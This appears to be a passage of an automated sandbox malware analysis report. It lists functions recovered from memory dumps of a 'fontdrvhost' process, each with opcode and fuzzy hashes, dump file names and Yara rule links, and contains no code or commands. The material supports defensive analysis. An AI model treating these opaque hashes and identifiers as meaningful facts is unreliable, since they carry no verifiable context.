                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9b28a44d14c23b5b8c8d4cc29608b605f119cb6621a96d23c971fb90ea208684
                                                                                                                    • Instruction ID: eee7a385d1edd468184559823facdbaa59bef85dee06650cdfd412c50b64bc0d
                                                                                                                    • Opcode Fuzzy Hash: 9b28a44d14c23b5b8c8d4cc29608b605f119cb6621a96d23c971fb90ea208684
                                                                                                                    • Instruction Fuzzy Hash: B2E01A6294E7C04FC74B9B3488B98557FA0DE1721174A40EAC145CF5A3EA2D8849C702
                                                                                                                    Function 00007FFD345AA730 Relevance: .0, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                    • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                    • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                    Function 00007FFD345ADB99 Relevance: .0, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 239da6a537d24acc307484f5cc3b2b6338bdbdac44191dc238e7287c5ad83cd8
                                                                                                                    • Instruction ID: ca8ac11cf7797c79aa5a3169dd3ff37a5413c01e981f4fac38f17e7a6ec85984
                                                                                                                    • Opcode Fuzzy Hash: 239da6a537d24acc307484f5cc3b2b6338bdbdac44191dc238e7287c5ad83cd8
                                                                                                                    • Instruction Fuzzy Hash: F7E04F6154F3C04FC70B973588A98443F70DE5721074A40EBC145CF1B3D51D8849C711
                                                                                                                    Function 00007FFD345ADB19 Relevance: .0, Instructions: 21COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 66d63cb6258d23d869a1ecd51ee20f904d4b52b984c1fb5e05bc21052b2dbbfc
                                                                                                                    • Instruction ID: f63f545cecffa73b970a1da6809dccca5c0b4a72840bf943b5d219e37b24af89
                                                                                                                    • Opcode Fuzzy Hash: 66d63cb6258d23d869a1ecd51ee20f904d4b52b984c1fb5e05bc21052b2dbbfc
                                                                                                                    • Instruction Fuzzy Hash: 68E0466198F7C04FC70B9B3088A88543F709E6721178A40EBC185CF2B3EA2E8949C702
                                                                                                                    Function 00007FFD34570B95 Relevance: .0, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1655bf586bd510a0444da9578f040976055379fdba1b0be01a33af2343bf41be
                                                                                                                    • Instruction ID: 131f8e6670127f12c57aa4973c076e6fc712adbd32214369c37ab35b822f7a12
                                                                                                                    • Opcode Fuzzy Hash: 1655bf586bd510a0444da9578f040976055379fdba1b0be01a33af2343bf41be
                                                                                                                    • Instruction Fuzzy Hash: 9BD0A73066C54A4FDA01B73CC8898547BA0EB0F214BD510F1D009C7561C5094C558B00
                                                                                                                    Function 00007FFD345A1FA0 Relevance: .0, Instructions: 18COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                    • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                    • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                    • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                    Function 00007FFD345A70C0 Relevance: .0, Instructions: 17COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 31d8b962ad8697e016be0419b8b3746812643610956d0d679795cb27cfcbcbb5
                                                                                                                    • Instruction ID: 29ce565ffcc28a448b4899142a808b5d3f0115b61ecf817ccfe49f91169fb415
                                                                                                                    • Opcode Fuzzy Hash: 31d8b962ad8697e016be0419b8b3746812643610956d0d679795cb27cfcbcbb5
                                                                                                                    • Instruction Fuzzy Hash: 0ED01234B519044F871DA63888A98747391EB6A216B9550A9D10ACB3B1E96ADC89C741
                                                                                                                    Function 00007FFD345AB9E0 Relevance: .0, Instructions: 17COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD345A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A1000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd345a1000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 11f0e614b61dd8402b1f6cef3bf42be3e8dbf3004db8f484bdd3684dcb90d91b
                                                                                                                    • Instruction ID: 6905f788ba68b15c66f2d4d848cf9fbc097d2f2c3ec125657350389146f74705
                                                                                                                    • Opcode Fuzzy Hash: 11f0e614b61dd8402b1f6cef3bf42be3e8dbf3004db8f484bdd3684dcb90d91b
                                                                                                                    • Instruction Fuzzy Hash: B1D02230B608040F870CBA3888A88303391EB6A20678000A8D00AC72B1DD2ADC8CCB40
                                                                                                                    Function 00007FFD34570CBF Relevance: .0, Instructions: 15COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 623355c4c761995da0b65237a2ec80d23bbe5063140a0c10700039931d7a4e64
                                                                                                                    • Instruction ID: 90755e1601f702b6e1c2031973e5eb8c9d7fc61b61d8cc93fb74160a23460c41
                                                                                                                    • Opcode Fuzzy Hash: 623355c4c761995da0b65237a2ec80d23bbe5063140a0c10700039931d7a4e64
                                                                                                                    • Instruction Fuzzy Hash: 71E01235F0D20ACBE701EB54C8D46ADBBA1EB52711F108275C501C7289DA7CA684D680
                                                                                                                    Function 00007FFD345706A5 Relevance: .0, Instructions: 13COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                                                                                                    • Instruction ID: 9f47ba4d225661f7cd5f4b457ea6ce03474966435a6b8b488fbb797968966456
                                                                                                                    • Opcode Fuzzy Hash: e38b839a962afbf7466bb809ed74affd0fe7e6cfbd99036e6d55b82f99f34630
                                                                                                                    • Instruction Fuzzy Hash: 09C04C06F5E51F01B417716E5CF60ADB9816BD7A64FD58172D70CD00C29C4D60D5A156
                                                                                                                    Function 00007FFD345712E0 Relevance: .0, Instructions: 12COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3ad9b737f9d3a71b5a47652e042b9bbfd47591b0a6598e927983330d6249448c
                                                                                                                    • Instruction ID: a5f03278bbd3854106ccb8996a77adaed6fc78beeb62c6d1ce4d5daa04a8c300
                                                                                                                    • Opcode Fuzzy Hash: 3ad9b737f9d3a71b5a47652e042b9bbfd47591b0a6598e927983330d6249448c
                                                                                                                    • Instruction Fuzzy Hash: 3FC04C349558098FC948EB69CC9591477A0FB1A215BD601A0E409C7171E65ADCD5D741
                                                                                                                    Function 00007FFD345759C7 Relevance: .0, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8d78488d99b53c3445f151f66e1b6215cb18ec765832eb3f50f29aa593328660
                                                                                                                    • Instruction ID: 8443d3d041e6feb84766e5ca6502d51d806cefd3e9f9919f382fd14d06b2e1a3
                                                                                                                    • Opcode Fuzzy Hash: 8d78488d99b53c3445f151f66e1b6215cb18ec765832eb3f50f29aa593328660
                                                                                                                    • Instruction Fuzzy Hash: 2DC08C00F0C81B03F1262384443127D84066B40744F840074E00DE63C6CC1C9F0203C6
                                                                                                                    Function 00007FFD345706C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34570000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                                                                                                    • Instruction ID: f47800afbfc2aa90f4ab12d7525e20c9578dc74f2022646a9a732b5480c9cf76
                                                                                                                    • Opcode Fuzzy Hash: 53bb17afe161cd3c8899fff8457088f758022530ecbe74bccee355b060b98651
                                                                                                                    • Instruction Fuzzy Hash: 9EB01200D5E40F00A405317B0CD20A4B8805B46104FC04070D60CC00C2984D10942242

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FFD34580622 Relevance: 9.0, Strings: 7, Instructions: 300COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34580000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: K_^$$K_^%$K_^1$K_^9$K_^:$^+=$#<K
                                                                                                                    • API String ID: 0-1709254129
                                                                                                                    • Opcode ID: 7109adf5e5455b1e7812a980ac01664e60d62356f358db5c7f9a2dcea8ace12b
                                                                                                                    • Instruction ID: 995b21efe7e46eb287d7093c1fe4b4f8b2368d3b7a6be4b4fbbc354b75e79e9b
                                                                                                                    • Opcode Fuzzy Hash: 7109adf5e5455b1e7812a980ac01664e60d62356f358db5c7f9a2dcea8ace12b
                                                                                                                    • Instruction Fuzzy Hash: 0B71EA27B0D5262AEA2977ED78A20FF7708DF913797144777E28CA90A38D18F8C241D5
                                                                                                                    Function 00007FFD345806D3 Relevance: 9.0, Strings: 7, Instructions: 226COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2382571328.00007FFD34580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34580000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd34580000_fontdrvhost.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: K_^$$K_^%$K_^1$K_^9$K_^:$^+=$#<K
                                                                                                                    • API String ID: 0-1709254129
                                                                                                                    • Opcode ID: 826cad02e9df8558e1c57dd88811ffa8deb86860069927c8c8d2ac5b2457a08f
                                                                                                                    • Instruction ID: 4242d5677f6bea317117dfd3a471e4a11946d0438cd8a874fd01739c3369dceb
                                                                                                                    • Opcode Fuzzy Hash: 826cad02e9df8558e1c57dd88811ffa8deb86860069927c8c8d2ac5b2457a08f
                                                                                                                    • Instruction Fuzzy Hash: 69516157B0C5262AE92937ED38A60FF6708DF61379B088777E10DA80A34D1CEC8241D9